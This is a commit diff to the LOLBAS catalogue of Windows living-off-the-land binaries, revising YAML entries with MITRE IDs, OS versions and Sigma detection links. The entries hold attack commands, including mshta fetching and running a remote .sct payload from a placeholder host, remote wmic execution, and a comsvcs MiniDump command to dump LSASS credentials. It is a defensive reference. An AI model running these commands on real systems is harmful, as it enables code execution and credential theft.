Addressing @bohops's feedback

2024-10-23 00:58:42 +02:00 · 2022-05-05 11:12:22 +01:00 · 2022-05-05 11:12:22 +01:00 · b92ee99627
commit b92ee99627
parent 085aaa37b1
11 changed files with 25 additions and 45 deletions
--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@ -1,18 +1,18 @@
 ---
 Name: Jsc.exe
-Description: Binary file used by .NET to compile javascript code to .exe or .dll format
+Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format
 Author: 'Oddvar Moe'
 Created: 2019-05-31
 Commands:
  - Command: jsc.exe scriptfile.js
-    Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
+    Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: jsc.exe /t:library Library.js
-    Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
+    Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@ -10,7 +10,7 @@ Commands:
    Category: Execute
    Privileges: User
    MitreID: T1218.014
-    OperatingSystem: Windows 10 (and possibly earlier versions)
+    OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
  - Command: mmc.exe gpedit.msc
    Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
    Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@ -18,15 +18,8 @@ Commands:
    Privileges: User
    MitreID: T1127.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: msbuild.exe @sample.rsp
-    Description: Executes Logger statements from rsp file
-    Usecase: Execute DLL
-    Category: Execute
-    Privileges: User
-    MitreID: T1127.001
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
-    Description: Executes generated Logger dll file with TargetLogger export
+    Description: Executes generated Logger DLL file with TargetLogger export
    Usecase: Execute DLL
    Category: Execute
    Privileges: User
@ -39,6 +32,13 @@ Commands:
    Privileges: User
    MitreID: T1127.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: msbuild.exe @sample.rsp
+    Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
+    Usecase: Bypass command-line based detections
+    Category: Execute
+    Privileges: User
+    MitreID: T1036
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
@ -69,6 +69,7 @@ Resources:
  - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191
  - Link: https://github.com/LOLBAS-Project/LOLBAS/issues/165
+  - Link: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files
  - Link: https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events
 Acknowledgement:
  - Person: Casey Smith
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@ -11,14 +11,14 @@ Commands:
    Privileges: User
    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
+  - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
    Description: Executes VBScript supplied as a command line argument.
    Usecase: Execute code
    Category: Execute
    Privileges: User
    MitreID: T1218.005
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-  - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
    Description: Executes JavaScript supplied as a command line argument.
    Usecase: Execute code
    Category: Execute
@ -36,7 +36,7 @@ Full_Path:
  - Path: C:\Windows\System32\mshta.exe
  - Path: C:\Windows\SysWOW64\mshta.exe
 Code_Sample:
-  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
+  - Code: https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/05c58b4892942c34bfa01e9ada88ef2663858e1c/rules/windows/process_creation/win_susp_mshta_pattern.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_invoke_obfuscation_via_use_mhsta.yml
--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
@ -18,13 +18,6 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
-    Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
-    Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
-    Category: Execute
-    Privileges: User
-    MitreID: T1218
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
    Description: Execute evil.exe on the remote system.
    Usecase: Execute binary on a remote system
@ -32,20 +25,6 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
-    Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
-    Usecase: Execute binary with scheduled task created with wmic on a remote computer
-    Category: Execute
-    Privileges: User
-    MitreID: T1218
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-  - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
-    Description: Create a volume shadow copy of NTDS.dit that can be copied.
-    Usecase: Execute binary on remote system
-    Category: Execute
-    Privileges: User
-    MitreID: T1218
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
    Description: Create a volume shadow copy of NTDS.dit that can be copied.
    Usecase: Execute binary on remote system
--- a/yml/OSLibraries/Advpack.yml
+++ b/yml/OSLibraries/Advpack.yml
@ -15,7 +15,7 @@ Commands:
    Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
    Usecase: Run local or remote script(let) code through INF file specification.
    Category: AWL Bypass
-    Privileges: Admin
+    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
  - Command: rundll32.exe advpack.dll,RegisterOCX test.dll
--- a/yml/OSLibraries/Ieadvpack.yml
+++ b/yml/OSLibraries/Ieadvpack.yml
@ -15,7 +15,7 @@ Commands:
    Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
    Usecase: Run local or remote script(let) code through INF file specification.
    Category: AWL Bypass
-    Privileges: Admin
+    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
  - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
--- a/yml/OSLibraries/Mshtml.yml
+++ b/yml/OSLibraries/Mshtml.yml
@ -5,7 +5,7 @@ Author:
 Created: 2018-05-25
 Commands:
  - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
-    Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).
+    Description: "Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box)."
    Usecase: Launch an HTA application.
    Category: Execute
    Privileges: User
--- a/yml/OSLibraries/comsvcs.yml
+++ b/yml/OSLibraries/comsvcs.yml
@ -4,7 +4,7 @@ Description: COM+ Services
 Author:
 Created: 2019-08-30
 Commands:
-  - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
+  - Command: powershell /c rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
    Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
    Usecase: Dump Lsass.exe process memory to retrieve credentials.
    Category: Dump
--- a/yml/OSScripts/Syncappvpublishingserver.yml
+++ b/yml/OSScripts/Syncappvpublishingserver.yml
@ -10,7 +10,7 @@ Commands:
    Category: Execute
    Privileges: User
    MitreID: T1216
-    OperatingSystem: Windows 10
+    OperatingSystem: Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
 Code_Sample:
--- a/yml/OSScripts/Winrm.yml
+++ b/yml/OSScripts/Winrm.yml
@ -19,11 +19,11 @@ Commands:
    MitreID: T1216
    OperatingSystem: Windows 10, Windows 11
  - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
-    Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location
-    Usecase: Execute aribtrary, unsigned code via XSL script
+    Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.
+    Usecase: Execute arbitrary, unsigned code via XSL script
    Category: AWL Bypass
    Privileges: User
-    MitreID: T1216
+    MitreID: T1220
    OperatingSystem: Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\System32\winrm.vbs